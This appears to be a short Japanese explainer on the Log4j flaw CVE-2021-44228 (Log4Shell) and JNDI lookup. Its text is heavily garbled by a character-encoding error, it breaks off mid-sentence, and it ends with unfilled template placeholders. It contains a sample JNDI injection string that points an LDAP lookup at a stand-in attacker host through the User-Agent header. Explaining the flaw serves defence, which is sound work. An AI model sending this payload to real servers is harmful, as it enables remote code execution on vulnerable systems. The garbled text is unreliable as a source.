ã€å›³è§£ã€‘Log4jã®è„†å¼±æ€§ CVE-2021-44228 (Log4shell or LogJam) ã«ã¤ã„ã¦JNDI ã¨ã¯Java Naming and Directory Interface ã¨ã„ã†ã€Java アプリケーション㌠DNS ã‚„ LDAP ç‰ã®ã‚µãƒ¼ãƒ“スを利用ã™ã‚‹ãŸã‚ã®æ±Žç”¨çš„ãªã‚¤ãƒ³ã‚¿ãƒ•ã‚§ãƒ¼ã‚¹ (ライブラリ) ã§ã™ã€‚ Log4j 㨠JNDI lookupApache Software Foundation ãŒé–‹ç™ºã—ãŸã€Java ベースã®ãƒã‚®ãƒ³ã‚°ã«é–¢ã™ã‚‹ãƒ©ã‚¤ãƒ–ラリã§ã™ã€‚JNDI lookup ã¨ã„ã†æ©Ÿèƒ½ãŒã‚ã‚Šã€æ›¸ã込んã ãƒã‚°ã®ä¸€éƒ¨ã‚’自動ã§å¤‰æ•°åŒ–ã—ã¾ã™ã€‚今回ã¯ã“ã®æ©Ÿèƒ½ãŒæ‚ªç”¨ã•ã‚Œã¦ã„ã¾ã™ã€‚ CVE-2021-44228 ã®æ”»æ’ƒã‚·ãƒ¼ã‚±ãƒ³ã‚¹ã®ä¾‹ 攻撃者ã¯è„†å¼±æ€§ã‚’トリガーã™ã‚‹ãŸã‚ã« http ヘッダ㮠User-Agent ã« ${jndi:ldap://attacker.com/a} ã¨ã„ã†æ–‡å—列を埋ã‚è¾¼ã¿ã€http リクエストをé€ä¿¡ã—ã¾ã™ã€‚脆弱性ã®ã‚るサーãƒã® Java App ã¯ãã®é€šä¿¡ã‚’
log4jã®è„†å¼±æ€§ã«ã¤ã„ã¦
{{#tags}}- {{label}}
{{/tags}}